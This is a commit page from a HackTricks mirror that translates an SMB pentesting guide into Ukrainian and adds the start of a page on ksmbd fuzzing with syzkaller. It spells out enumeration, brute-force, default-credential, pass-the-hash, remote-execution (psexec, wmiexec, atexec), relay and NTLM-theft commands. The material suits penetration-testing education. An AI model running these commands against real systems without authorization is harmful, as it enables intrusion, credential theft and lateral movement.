maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-smb/ksmbd-attack

Browse Source
This commit is contained in:
Translator 2025-09-08 06:21:26 +00:00
parent ffc6364038
commit 36f3a426d1
3 changed files with 328 additions and 101 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -494,6 +494,7 @@
- [135, 593 - Pentesting MSRPC](network-services-pentesting/135-pentesting-msrpc.md)
- [137,138,139 - Pentesting NetBios](network-services-pentesting/137-138-139-pentesting-netbios.md)
- [139,445 - Pentesting SMB](network-services-pentesting/pentesting-smb/README.md)
- [Ksmbd Attack Surface And Fuzzing Syzkaller](network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md)
- [rpcclient enumeration](network-services-pentesting/pentesting-smb/rpcclient-enumeration.md)
- [143,993 - Pentesting IMAP](network-services-pentesting/pentesting-imap.md)
- [161,162,10161,10162/udp - Pentesting SNMP](network-services-pentesting/pentesting-snmp/README.md)

209
src/network-services-pentesting/pentesting-smb/README.md
View File

@ -2,61 +2,62 @@
{{#include ../../banners/hacktricks-training.md}}
## **Порт 139**
## **Port 139**
_**Network Basic Input Output System**_** (NetBIOS)** — це програмний протокол, розроблений для того, щоб дозволити додаткам, ПК та робочим станціям у локальній мережі (LAN) взаємодіяти з мережевим обладнанням та **сприяти передачі даних через мережу**. Ідентифікація та розташування програмного забезпечення, що працює в мережі NetBIOS, здійснюється через їхні імена NetBIOS, які можуть мати до 16 символів у довжину і часто відрізняються від імені комп'ютера. Сесія NetBIOS між двома додатками ініціюється, коли один додаток (який діє як клієнт) віддає команду "викликати" інший додаток (який діє як сервер), використовуючи **TCP Port 139**.
The _**Мережева система базового вводу/виводу**_** (NetBIOS)** — це програмний протокол, призначений забезпечити взаємодію додатків, ПК та настільних комп'ютерів у локальній мережі (LAN) з мережевим обладнанням та **полегшити передачу даних мережею**. Ідентифікація та визначення місцезнаходження програм, що працюють у мережі NetBIOS, здійснюються за їхніми іменами NetBIOS, які можуть налічувати до 16 символів і часто відрізняються від імені комп'ютера. Сеанс NetBIOS між двома додатками ініціюється, коли один додаток (в ролі клієнта) відправляє команду "call" іншому додатку (в ролі сервера), використовуючи **TCP Port 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Port 445
Технічно, порт 139 називається «NBT over IP», тоді як порт 445 ідентифікується як «SMB over IP». Абревіатура **SMB** означає «**Server Message Blocks**», яка також сучасно відома як **Common Internet File System (CIFS)**. Як протокол мережевого рівня додатків, SMB/CIFS в основному використовується для забезпечення спільного доступу до файлів, принтерів, послідовних портів та полегшення різних форм комунікації між вузлами в мережі.
Технічно Port 139 позначається як «NBT over IP», тоді як Port 445 — як «SMB over IP». Абревіатура **SMB** означає «**Server Message Blocks**», що сучасно відоме як **Common Internet File System (CIFS)**. Як мережевий протокол прикладного рівня, SMB/CIFS переважно використовується для надання спільного доступу до файлів, принтерів, послідовних портів та для забезпечення різних форм взаємодії між вузлами в мережі.
Наприклад, у контексті Windows підкреслюється, що SMB може працювати безпосередньо через TCP/IP, усуваючи необхідність у NetBIOS через TCP/IP, за допомогою використання порту 445. Навпаки, на різних системах спостерігається використання порту 139, що вказує на те, що SMB виконується разом з NetBIOS через TCP/IP.
Наприклад, у контексті Windows відзначається, що SMB може працювати безпосередньо поверх TCP/IP, усуваючи необхідність у NetBIOS over TCP/IP шляхом використання порту 445. Натомість на інших системах використовується порт 139, що вказує на те, що SMB виконується разом із NetBIOS over TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
Протокол **Server Message Block (SMB)**, що працює за моделлю **клієнт-сервер**, призначений для регулювання **доступу до файлів**, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. Переважно використовується в серії операційних систем **Windows**, SMB забезпечує зворотну сумісність, дозволяючи пристроям з новішими версіями операційної системи Microsoft безперешкодно взаємодіяти з тими, що працюють на старіших версіях. Крім того, проект **Samba** пропонує безкоштовне програмне забезпечення, що дозволяє реалізувати SMB на системах **Linux** та Unix, тим самим полегшуючи крос-платформену комунікацію через SMB.
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed for regulating **доступу до файлів**, каталогів та інших мережевих ресурсів, таких як принтери та маршрутизатори. Переважно використовується в сімействі операційних систем **Windows**, SMB забезпечує зворотну сумісність, дозволяючи пристроям з новішими версіями ОС Microsoft безперешкодно взаємодіяти з пристроями на старіших версіях. Крім того, проект **Samba** пропонує вільне програмне забезпечення для реалізації SMB на системах **Linux** та Unix, що полегшує крос-платформенну взаємодію через SMB.
Спільні ресурси, що представляють **випадкові частини локальної файлової системи**, можуть надаватися сервером SMB, що робить ієрархію видимою для клієнта частково **незалежною** від фактичної структури сервера. **Списки контролю доступу (ACLs)**, які визначають **права доступу**, дозволяють **точний контроль** над дозволами користувачів, включаючи атрибути, такі як **`execute`**, **`read`** та **`full access`**. Ці дозволи можуть бути призначені окремим користувачам або групам, залежно від спільних ресурсів, і відрізняються від локальних дозволів, встановлених на сервері.
Шари, що представляють **довільні частини локальної файлової системи**, можуть надаватися SMB-сервером, роблячи ієрархію, видиму клієнту, частково **незалежною** від фактичної структури сервера. **Access Control Lists (ACLs)**, які визначають **права доступу**, дозволяють **тонко налаштовувати** дозволи користувачів, включаючи атрибути на кшталт **`execute`**, **`read`** і **`full access`**. Ці дозволи можуть призначатися окремим користувачам або групам на основі шарів і відрізняються від локальних дозволів, встановлених на сервері.
### IPC$ Share
Доступ до спільного ресурсу IPC$ можна отримати через анонімну нульову сесію, що дозволяє взаємодіяти з сервісами, які відкриті через іменовані канали. Утиліта `enum4linux` корисна для цієї мети. Правильне використання дозволяє отримати:
Доступ до IPC$ share може бути отриманий через анонімну null-сесію, що дозволяє взаємодіяти з сервісами, виставленими через іменовані канали (named pipes). Утиліта `enum4linux` корисна для цього. При правильному використанні вона дозволяє отримати:
- Інформацію про операційну систему
- Деталі про батьківський домен
- Зведення локальних користувачів та груп
- Інформацію про доступні SMB спільні ресурси
- Дані про батьківський домен
- Перелік локальних користувачів і груп
- Інформацію про доступні SMB-шари
- Діючу політику безпеки системи
Ця функціональність є критично важливою для мережевих адміністраторів та фахівців з безпеки для оцінки безпекової позиції служб SMB (Server Message Block) в мережі. `enum4linux` надає всебічний огляд середовища SMB цільової системи, що є суттєвим для виявлення потенційних вразливостей та забезпечення належного захисту служб SMB.
Ця функціональність критично важлива для мережевих адміністраторів та фахівців із безпеки для оцінки рівня захищеності SMB (Server Message Block) сервісів у мережі. Утиліта `enum4linux` надає комплексний огляд SMB-середовища цільової системи, що є необхідним для виявлення потенційних вразливостей та забезпечення належного захисту SMB-сервісів.
```bash
enum4linux -a target_ip
```
Вищезазначена команда є прикладом того, як `enum4linux` може бути використано для виконання повної енумерації проти цілі, вказаної через `target_ip`.
Наведена вище команда є прикладом того, як `enum4linux` може використовуватися для виконання повного enumeration щодо цілі, зазначеної як `target_ip`.
## Що таке NTLM
Якщо ви не знаєте, що таке NTLM або хочете дізнатися, як це працює і як його зловживати, вам буде дуже цікава ця сторінка про **NTLM**, де пояснюється **як працює цей протокол і як ви можете скористатися ним:**
Якщо ви не знаєте, що таке NTLM або хочете дізнатися, як він працює і як ним можна зловживати, вам буде дуже цікава ця сторінка про **NTLM**, де пояснюється **як працює цей протокол і як ви можете ним скористатися:**
{{#ref}}
../../windows-hardening/ntlm/
{{#endref}}
## **Енумерація сервера**
## **Server Enumeration**
### **Сканування** мережі в пошуках хостів:
### **Scan** мережу в пошуках хостів:
```bash
nbtscan -r 192.168.0.1/24
```
### SMB сервер версія
### Версія SMB сервера
Щоб шукати можливі експлойти для версії SMB, важливо знати, яка версія використовується. Якщо ця інформація не з'являється в інших використовуваних інструментах, ви можете:
Щоб шукати можливі експлойти для версії SMB, важливо знати, яка саме версія використовується. Якщо ця інформація не відображається в інших використовуваних інструментах, ви можете:
- Використати **MSF** допоміжний модуль `**auxiliary/scanner/smb/smb_version**`
- Використайте **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Або цей скрипт:
```bash
#!/bin/sh
@ -74,30 +75,30 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Пошук експлойтів**
### **Пошук exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Можливі** облікові дані
| **Ім'я користувача(ів)** | **Звичайні паролі** |
| ------------------------- | ----------------------------------------- |
| _(порожньо)_ | _(порожньо)_ |
| гість | _(порожньо)_ |
| Адміністратор, admin | _(порожньо)_, пароль, адміністратор, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | пароль, test, lab, demo |
| **Імена користувачів** | **Поширені паролі** |
| ---------------------- | ----------------------------------------- |
| _(порожньо)_ | _(порожньо)_ |
| guest | _(порожньо)_ |
| Administrator, admin | _(порожньо)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
### Брутфорс
### Brute Force
- [**SMB Брутфорс**](../../generic-hacking/brute-force.md#smb)
- [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb)
### Інформація про середовище SMB
### Отримати інформацію
### Отримання інформації
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
@ -119,9 +120,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Перерахунок користувачів, груп та увійшлих користувачів
### Перерахування користувачів, груп та користувачів, які увійшли в систему
Цю інформацію вже слід зібрати з enum4linux та enum4linux-ng
Ця інформація вже має бути зібрана за допомогою enum4linux та enum4linux-ng
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -133,44 +134,44 @@ rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Перерахувати локальних користувачів
### Перерахування локальних користувачів
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
Однорядковий код
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Перерахунок локальних користувачів
### Metasploit - Перелічити локальних користувачів
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Перерахунок LSARPC та SAMR rpcclient**
### **Перерахування LSARPC і SAMR через rpcclient**
{{#ref}}
rpcclient-enumeration.md
{{#endref}}
### GUI з'єднання з linux
### GUI-з'єднання з linux
#### У терміналі:
`xdg-open smb://cascade.htb/`
#### У вікні файлового менеджера (nautilus, thunar тощо)
#### У вікні файлового браузера (nautilus, thunar, etc)
`smb://friendzone.htb/general/`
## Перерахунок спільних папок
## Перелік спільних папок
### Список спільних папок
### Перелічити спільні папки
Завжди рекомендується перевірити, чи можете ви отримати доступ до чогось, якщо у вас немає облікових даних, спробуйте використати **null** **облікові дані/гостевий користувач**.
Завжди рекомендовано перевірити, чи маєте доступ до чого-небудь; якщо у вас немає credentials, спробуйте використати **null** **credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -184,7 +185,7 @@ crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```
### **Підключення/Список спільної папки**
### **Підключити/Переглянути спільну папку**
```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
@ -196,11 +197,11 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Вручну перерахувати спільні ресурси Windows та підключитися до них**
### **Вручну перерахувати Windows shares і підключитися до них**
Можливо, вам заборонено відображати будь-які спільні ресурси хост-машини, і коли ви намагаєтеся їх перерахувати, здається, що немає жодних ресурсів для підключення. Тому варто спробувати вручну підключитися до ресурсу. Щоб вручну перерахувати ресурси, ви можете звернути увагу на відповіді, такі як NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME, використовуючи дійсну сесію (наприклад, нульову сесію або дійсні облікові дані). Це може вказувати на те, чи існує ресурс, і ви не маєте до нього доступу, або ресурс зовсім не існує.
Може виявитися, що вам обмежено показувати будь-які shares хост-машини, і при спробі їх перерахувати здається, ніби немає жодних shares для підключення. Тому варто спробувати вручну підключитися до share. Щоб перерахувати shares вручну, слід звертати увагу на відповіді на кшталт NT_STATUS_ACCESS_DENIED та NT_STATUS_BAD_NETWORK_NAME при використанні валідної сесії (наприклад null session або дійсні облікові дані). Це може вказувати на те, що share існує, але у вас немає доступу, або ж share взагалі не існує.
Звичайні імена спільних ресурсів для цілей Windows:
Common share names for windows targets are
- C$
- D$
@ -211,14 +212,14 @@ smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-t
- SYSVOL
- NETLOGON
(Звичайні імена спільних ресурсів з _**Network Security Assessment 3rd edition**_)
(Common share names from _**Network Security Assessment 3rd edition**_)
Ви можете спробувати підключитися до них, використовуючи наступну команду
You can try to connect to them by using the following command
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
для цього скрипта (використовуючи нульову сесію)
або цей скрипт (використовуючи null session)
```bash
#/bin/bash
@ -240,7 +241,7 @@ done
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Перерахунок спільних ресурсів з Windows / без сторонніх інструментів**
### **Перелічити shares у Windows / без сторонніх інструментів**
PowerShell
```bash
@ -266,16 +267,16 @@ fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (графічний), введіть `\\<ip>\`, щоб побачити доступні неприховані спільні папки.
explorer.exe (графічний), введіть `\\<ip>\` щоб побачити доступні неприховані shares.
### Підключити спільну папку
### Підключення спільної папки
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Завантажити файли**
Прочитайте попередні розділи, щоб дізнатися, як підключитися з обліковими даними/Pass-the-Hash.
Прочитайте попередні розділи, щоб навчитися підключатися за допомогою credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -292,34 +293,34 @@ smbclient //<IP>/<share>
```
Команди:
- mask: вказує маску, яка використовується для фільтрації файлів у каталозі (наприклад, "" для всіх файлів)
- mask: визначає маску, яка використовується для фільтрації файлів у директорії (наприклад "" для всіх файлів)
- recurse: вмикає рекурсію (за замовчуванням: вимкнено)
- prompt: вимикає запит на імена файлів (за замовчуванням: увімкнено)
- mget: копіює всі файли, що відповідають масці, з хоста на клієнтську машину
- prompt: вимикає запит імен файлів (за замовчуванням: увімкнено)
- mget: копіює всі файли, що відповідають масці, з host на client machine
(_Інформація з man-сторінки smbclient_)
(_Інформація з manpage smbclient_)
### Пошук спільних папок домену
### Пошук загальних папок домену
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
- [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) спайдер.
- [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
- `-M spider_plus [--share <share_name>]`
- `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Особливо цікавими з загальних ресурсів є файли під назвою **`Registry.xml`**, оскільки вони **можуть містити паролі** для користувачів, налаштованих на **автологін** через групову політику. Або файли **`web.config`**, оскільки вони містять облікові дані.
Особливо цікавими серед shares є файли з назвою **`Registry.xml`**, оскільки вони **можуть містити паролі** для користувачів, налаштованих з **autologon** через Group Policy. Або файли **`web.config`**, оскільки вони містять облікові дані.
> [!TIP]
> **SYSVOL share** є **доступним для читання** для всіх автентифікованих користувачів у домені. Там ви можете **знайти** багато різних пакетних, VBScript та PowerShell **скриптів**.\
> Вам слід **перевірити** **скрипти** всередині, оскільки ви можете **знайти** чутливу інформацію, таку як **паролі**.
> **SYSVOL share** доступний для читання всім автентифікованим користувачам у домені. Там ви можете **знайти** багато різних batch, VBScript, і PowerShell **скриптів**.\
> Вам слід **перевірити** **скрипти** всередині нього, оскільки там можна **знайти** конфіденційну інформацію, таку як **паролі**.
## Читання реєстру
Ви можете мати можливість **читати реєстр**, використовуючи деякі виявлені облікові дані. Impacket **`reg.py`** дозволяє вам спробувати:
Ви можете бути в змозі **прочитати реєстр**, використовуючи знайдені облікові дані. Impacket **`reg.py`** дозволяє спробувати:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
@ -327,26 +328,26 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
```
## Post Exploitation
**За замовчуванням конфігурація** сервера **Samba** зазвичай розташована в `/etc/samba/smb.conf` і може містити деякі **небезпечні конфігурації**:
**Конфігурація за замовчуванням** **Samba** сервера зазвичай знаходиться в `/etc/samba/smb.conf` і може містити деякі **небезпечні налаштування**:
| **Налаштування** | **Опис** |
| **Setting** | **Description** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Дозволити перегляд доступних спільних ресурсів у поточному ресурсі? |
| `read only = no` | Заборонити створення та модифікацію файлів? |
| `writable = yes` | Дозволити користувачам створювати та модифікувати файли? |
| `guest ok = yes` | Дозволити підключення до служби без використання пароля? |
| `enable privileges = yes` | Враховувати привілеї, призначені конкретному SID? |
| `create mask = 0777` | Які дозволи повинні бути призначені новоствореним файлам? |
| `directory mask = 0777` | Які дозволи повинні бути призначені новоствореним каталогам? |
| `logon script = script.sh` | Який скрипт потрібно виконати під час входу користувача? |
| `magic script = script.sh` | Який скрипт повинен бути виконаний, коли скрипт закривається? |
| `magic output = script.out` | Де потрібно зберігати вихідні дані магічного скрипта? |
| `browseable = yes` | Дозволяє перераховувати доступні шари у поточному ресурсі? |
| `read only = no` | Забороняє створення та зміну файлів? |
| `writable = yes` | Дозволяє користувачам створювати та змінювати файли? |
| `guest ok = yes` | Дозволяє підключатися до служби без використання пароля? |
| `enable privileges = yes` | Дотримуватися привілеїв, призначених конкретному SID? |
| `create mask = 0777` | Які права мають бути присвоєні новоствореним файлам? |
| `directory mask = 0777` | Які права мають бути присвоєні новоствореним каталогам? |
| `logon script = script.sh` | Який скрипт потрібно виконати при вході користувача? |
| `magic script = script.sh` | Який скрипт слід виконати, коли скрипт завершується? |
| `magic output = script.out` | Де має зберігатися вивід magic script? |
Команда `smbstatus` надає інформацію про **сервер** та про **те, хто підключений**.
Команда `smbstatus` дає інформацію про **сервер** та про те, **хто підключений**.
## Authenticate using Kerberos
## Аутентифікація за допомогою Kerberos
Ви можете **автентифікуватися** в **kerberos** за допомогою інструментів **smbclient** та **rpcclient**:
Ви можете **аутентифікуватися** в **kerberos** за допомогою інструментів **smbclient** та **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
@ -355,7 +356,7 @@ rpcclient -k ws01win10.domain.com
### **crackmapexec**
crackmapexec може виконувати команди **зловживаючи** будь-яким з **mmcexec, smbexec, atexec, wmiexec**, при цьому **wmiexec** є **методом за замовчуванням**. Ви можете вказати, який варіант ви віддаєте перевагу, за допомогою параметра `--exec-method`:
crackmapexec може виконувати команди **використовуючи** будь-який з **mmcexec, smbexec, atexec, wmiexec**, при цьому **wmiexec** є **методом за замовчуванням**. Ви можете вказати, який варіант хочете використовувати за допомогою параметра `--exec-method`:
```bash
apt-get install crackmapexec
@ -379,9 +380,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Обидва варіанти **створять нову службу** (використовуючи _\pipe\svcctl_ через SMB) на машині жертви і використовують її для **виконання чогось** (**psexec** **завантажить** виконуваний файл до ADMIN$ share, а **smbexec** вказуватиме на **cmd.exe/powershell.exe** і передаватиме в аргументах корисне навантаження --**техніка без файлів-**-).\
**Більше інформації** про [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)та [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
У **kali** він знаходиться за адресою /usr/share/doc/python3-impacket/examples/
Обидва варіанти **створюють нову службу** (використовуючи _\pipe\svcctl_ через SMB) на машині жертви і використовують її для **запуску чогось** (**psexec** **завантажує** виконуваний файл на ADMIN$ share, а **smbexec** вказує на **cmd.exe/powershell.exe** і передає в аргументи payload —**file-less technique-**-).\
**Детальніше** про [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md) та [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
У **kali** він розташований у /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
@ -389,19 +390,19 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Використовуючи **параметр** `-k`, ви можете аутентифікуватися за допомогою **kerberos** замість **NTLM**.
Використовуючи **параметр**`-k`, ви можете автентифікуватися через **kerberos** замість **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Сховано виконайте командний оболонку, не торкаючись диска або не запускаючи нову службу, використовуючи DCOM через **порт 135.**\
У **kali** він знаходиться за адресою /usr/share/doc/python3-impacket/examples/
Непомітно запустити командну оболонку без запису на диск або запуску нового сервісу, використовуючи DCOM через **port 135.**\
У **kali** він знаходиться у /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Використовуючи **параметр** `-k`, ви можете аутентифікуватися за допомогою **kerberos** замість **NTLM**.
Використовуючи **параметр**`-k` ви можете автентифікуватися за допомогою **kerberos** замість **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -410,52 +411,58 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Виконання команд через Планувальник завдань (використовуючи _\pipe\atsvc_ через SMB).\
У **kali** він знаходиться за адресою /usr/share/doc/python3-impacket/examples/
Виконує команди через Task Scheduler (використовуючи _\pipe\atsvc_ через SMB).\
У **kali** він знаходиться на /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
## Impacket reference
## Impacket довідник
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **Брутфорс облікових даних користувачів**
### ksmbd attack surface та SMB2/SMB3 protocol fuzzing (syzkaller)
**Це не рекомендується, ви можете заблокувати обліковий запис, якщо перевищите максимальну кількість дозволених спроб**
{{#ref}}
ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}
## **Bruteforce облікові дані користувачів**
**Це не рекомендується — ви можете заблокувати обліковий запис, якщо перевищите максимально дозволену кількість спроб**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
Цей атака використовує набір інструментів Responder для **захоплення SMB аутентифікаційних сесій** в внутрішній мережі та **пересилає** їх на **цільову машину**. Якщо **сесія аутентифікації успішна**, ви автоматично потрапите в **системний** **shell**.\
[**Більше інформації про цю атаку тут.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
Ця атака використовує Responder toolkit для **перехоплення SMB аутентифікаційних сесій** у внутрішній мережі та **пересилання** їх на **цільову машину**. Якщо аутентифікаційна **сесія успішна**, це автоматично відкриє вам **system** **shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися на хості, коли сторінка намагається отримати доступ до деякого контенту через SMB, наприклад: `img src="\\10.10.10.10\path\image.jpg"`
Бібліотека Windows URLMon.dll автоматично намагається аутентифікуватися на хості, коли сторінка намагається отримати доступ до вмісту через SMB, наприклад: `img src="\\10.10.10.10\path\image.jpg"`
Це відбувається з функціями:
This happens with the functions:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Які використовуються деякими браузерами та інструментами (як Skype)
Which are used by some browsers and tools (like Skype)
![З: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
### SMBTrap using MitMf
### SMBTrap з використанням MitMf
![З: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (892).png>)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (892).png>)
## NTLM Theft
Схоже на SMB Trapping, розміщення шкідливих файлів на цільовій системі (через SMB, наприклад) може викликати спробу аутентифікації SMB, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструменту, такого як Responder. Хеш потім може бути зламаний офлайн або використаний в [SMB relay attack](#smb-relay-attack).
Схоже на SMB Trapping, розміщення шкідливих файлів на цільовій системі (наприклад через SMB) може спричинити спробу SMB-аутентифікації, що дозволяє перехопити хеш NetNTLMv2 за допомогою інструменту, наприклад Responder. Хеш можна потім зламати офлайн або використати в [SMB relay attack](#smb-relay-attack).
[Дивіться: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks Automatic Commands
```

219
src/network-services-pentesting/pentesting-smb/ksmbd-attack-surface-and-fuzzing-syzkaller.md Normal file
View File

@ -0,0 +1,219 @@
# Поверхня атак ksmbd та fuzzing протоколу SMB2/SMB3 (syzkaller)
{{#include ../../banners/hacktricks-training.md}}
## Огляд
Ця сторінка узагальнює практичні підходи для опрацювання та fuzzing Linux in-kernel SMB сервера (ksmbd) з використанням syzkaller. У фокусі — розширення поверхні атак протоколу через конфігурацію, побудова стейтфул harness'а, здатного ланцюжити SMB2 операції, генерування граматично валідних PDU, спрямовування мутацій у слабо охоплені гілки коду та використання можливостей syzkaller, таких як focus_areas і ANYBLOB. Хоча оригінальне дослідження перелічує конкретні CVE, тут ми наголошуємо на повторно використовувальній методології та конкретних фрагментах, які ви можете адаптувати до власних налаштувань.
Цільовий обсяг: SMB2/SMB3 поверх TCP. Kerberos і RDMA свідомо поза обсягом, щоб зберегти harness простим.
---
## Розширення поверхні атак ksmbd через конфігурацію
За замовчуванням мінімальна конфігурація ksmbd залишає великі частини сервера неохопленими. Увімкніть наступні можливості, щоб прогнати сервер через додаткові парсери/обробники й досягти глибших гілок коду:
- На глобальному рівні
- Durable handles
- Server multi-channel
- SMB2 leases
- На рівні шару (per-share-level)
- Oplocks (увімкнено за замовчуванням)
- VFS objects
Увімкнення цих опцій збільшує виконання в модулях, таких як:
- smb2pdu.c (парсинг/диспатч команд)
- ndr.c (NDR encode/decode)
- oplock.c (oplock request/break)
- smbacl.c (парсинг/примус дотримання ACL)
